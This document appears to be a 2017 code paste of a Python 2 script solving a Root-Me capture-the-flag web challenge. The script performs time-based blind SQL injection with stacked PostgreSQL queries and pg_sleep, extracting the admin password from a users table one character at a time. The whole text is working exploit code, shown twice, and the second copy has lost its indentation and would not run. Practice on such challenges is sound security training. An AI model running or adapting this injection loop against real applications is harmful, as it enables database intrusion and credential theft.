veeeeeeeeeee · November 18, 2017 08:15
diff --git a/blind.py b/blind.py
 #!/usr/bin/env python

 import requests

 baseurl = 'http://challenge01.root-me.org/web-serveur/ch40/'
 inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'

 cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
 cond2 = '((select chr(117)||chr(115)||chr(101)||chr(114)||chr(115)) in (select table_name from information_schema.tables))'
 cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'

 #r = requests.get(baseurl, params=payload);

 def test():
    payload = {'action' : 'member', 'member' : inject % cond2}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()

    return 0

 def length():
    cond = cond3 % 12
    payload = {'action' : 'member', 'member' : inject % cond}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()

    return 0

 #45
 def password():
    col = ""

    for i in range(1, 14):
        print 'i=' + str(i)

        j = 32
        loop = True

        while j <= 176 and loop:
            # '(chr(%d) = substr((select table_name from information_schema.tables where table_schema not in ($$information_schema$$, $$pg_catalog$$)), %d, 1))'
            cond = cond1 % (j, i)
            payload = {'action' : 'member', 'member' : inject % cond}

            r = requests.get(baseurl, params=payload)
            #print r.elapsed.total_seconds()
            if r.elapsed.total_seconds() > 2.4:
                loop = False
                col = col + chr(j)
                #print j
                print col

            j = j+1

 #print length()
 print password()
 #print test()
	#!/usr/bin/env python

	import requests

	baseurl = 'http://challenge01.root-me.org/web-serveur/ch40/'
	inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'

	cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
	cond2 = '((select chr(117)\|\|chr(115)\|\|chr(101)\|\|chr(114)\|\|chr(115)) in (select table_name from information_schema.tables))'
	cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'

	#r = requests.get(baseurl, params=payload);

	def test():
	payload = {'action' : 'member', 'member' : inject % cond2}
	r = requests.get(baseurl, params=payload)
	print r.url
	print r.elapsed.total_seconds()

	return 0

	def length():
	cond = cond3 % 12
	payload = {'action' : 'member', 'member' : inject % cond}
	r = requests.get(baseurl, params=payload)
	print r.url
	print r.elapsed.total_seconds()

	return 0

	#45
	def password():
	col = ""

	for i in range(1, 14):
	print 'i=' + str(i)

	j = 32
	loop = True

	while j <= 176 and loop:
	# '(chr(%d) = substr((select table_name from information_schema.tables where table_schema not in ($$information_schema$$, $$pg_catalog$$)), %d, 1))'
	cond = cond1 % (j, i)
	payload = {'action' : 'member', 'member' : inject % cond}

	r = requests.get(baseurl, params=payload)
	#print r.elapsed.total_seconds()
	if r.elapsed.total_seconds() > 2.4:
	loop = False
	col = col + chr(j)
	#print j
	print col

	j = j+1

	#print length()
	print password()
	#print test()